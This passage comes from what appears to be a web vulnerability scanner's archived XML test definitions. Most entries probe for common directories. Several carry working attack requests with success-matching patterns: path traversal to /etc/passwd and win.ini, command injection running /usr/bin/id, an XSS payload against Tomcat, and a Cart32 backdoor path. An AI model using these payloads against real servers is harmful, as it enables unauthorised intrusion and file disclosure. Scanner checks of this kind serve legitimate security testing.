any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/contextAdmin/contextAdmin.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-211.xml0100664000076500007650000000705407566204543017556 0ustar davedave (Administration/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Administration/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-212.xml0100664000076500007650000000705407566204543017557 0ustar davedave (administration/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /administration/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-213.xml0100664000076500007650000000705207566204543017556 0ustar davedave (administrator/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /administrator/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-214.xml0100664000076500007650000000704607566204543017562 0ustar davedave (Admin_files/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Admin_files/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-215.xml0100664000076500007650000000707607566204543017566 0ustar davedave (advwebadmin/) "This might be interesting...probably HostingController 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /advwebadmin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-216.xml0100664000076500007650000000702407566204543017560 0ustar davedave (akopia/) "Akopia is installed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /akopia/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-217.xml0100664000076500007650000000703407566204543017562 0ustar davedave (analog/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /analog/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-218.xml0100664000076500007650000000732707566204543017570 0ustar davedave (ans.pl?p=../../../../../usr/bin/id|&blah) "Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1' 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ uid 200 uid 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-219.xml0100664000076500007650000000702607566204543017565 0ustar davedave (app/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /app/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-21.xml0100664000076500007650000000706307566204543017475 0ustar davedave (/) "By sending an OPTIONS request for / 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET // HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ not found for\: 200 not found for\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-220.xml0100664000076500007650000000703007566204543017550 0ustar davedave (apps/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /apps/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-221.xml0100664000076500007650000000703607566204543017557 0ustar davedave (archive/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /archive/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-222.xml0100664000076500007650000000731207566204543017555 0ustar davedave (article.php?article=4965&post=1111111111) "PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /article.php?article=4965&post=1111111111 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Unable to jump to row 200 Unable to jump to row 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-223.xml0100664000076500007650000000702607566204543017560 0ustar davedave (asp/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /asp/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-224.xml0100664000076500007650000000702607566204543017561 0ustar davedave (atc/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /atc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-225.xml0100664000076500007650000000705107566204543017560 0ustar davedave (awebvisit.stat) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /awebvisit.stat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-226.xml0100664000076500007650000000703407566204543017562 0ustar davedave (backup/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /backup/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-227.xml0100664000076500007650000000702607566204543017564 0ustar davedave (bak/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bak/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-228.xml0100664000076500007650000000715607566204543017571 0ustar davedave (ban.bak) "Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ban.bak HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-229.xml0100664000076500007650000000715607566204543017572 0ustar davedave (ban.dat) "Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ban.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-22.xml0100664000076500007650000000745407566204543017502 0ustar davedave (666%0a%0a<script>alert('Vulnerable');</script>666.jsp) "Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\);</script> 200 <script>alert\('Vulnerable'\);</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-230.xml0100664000076500007650000000715607566204543017562 0ustar davedave (ban.log) "Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ban.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-231.xml0100664000076500007650000000716407566204543017562 0ustar davedave (banmat.pwd) "Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /banmat.pwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-232.xml0100664000076500007650000000735407566204543017564 0ustar davedave (basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu) "Remote file retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-233.xml0100664000076500007650000000743507566204543017565 0ustar davedave (bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK) "The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-234.xml0100664000076500007650000000707307566204543017564 0ustar davedave (bc4j.html) "Default Oracle page 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bc4j.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Business Components 200 Business Components 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-235.xml0100664000076500007650000000703007566204543017556 0ustar davedave (beta/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /beta/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-236.xml0100664000076500007650000000703707566204543017566 0ustar davedave (bigconf.cgi) "BigIP Configuration CGI" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bigconf.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-237.xml0100664000076500007650000000702607566204543017565 0ustar davedave (bin/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-238.xml0100664000076500007650000000723607566204543017571 0ustar davedave (blah-whatever-badfile.jsp) "The web server is configured to respond with the web server path when requesting a non-existent .jsp file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /blah-whatever-badfile.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Script / 200 Script / 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-239.xml0100664000076500007650000000717607566204543017575 0ustar davedave (blah123.php) "PHP is configured to give descriptive error messages which can reveal file system paths." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /blah123.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Failed opening 200 Failed opening 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-23.xml0100664000076500007650000000715007566204543017474 0ustar davedave (admin.cgi) "InterScan VirusWall administration is accessible without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Administration 200 Administration 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-240.xml0100664000076500007650000000713707566204543017562 0ustar davedave (blah_badfile.shtml) "Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /blah_badfile.shtml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-241.xml0100664000076500007650000000702607566204543017560 0ustar davedave (buy/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /buy/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-242.xml0100664000076500007650000000703407566204543017560 0ustar davedave (buynow/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /buynow/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-243.xml0100664000076500007650000000702207566204543017556 0ustar davedave (c/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /c/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-244.xml0100664000076500007650000000721207566204543017560 0ustar davedave (c32web.exe/ChangeAdminPassword) "This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /c32web.exe/ChangeAdminPassword HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-245.xml0100664000076500007650000000736207566204543017567 0ustar davedave (ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini) "It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. 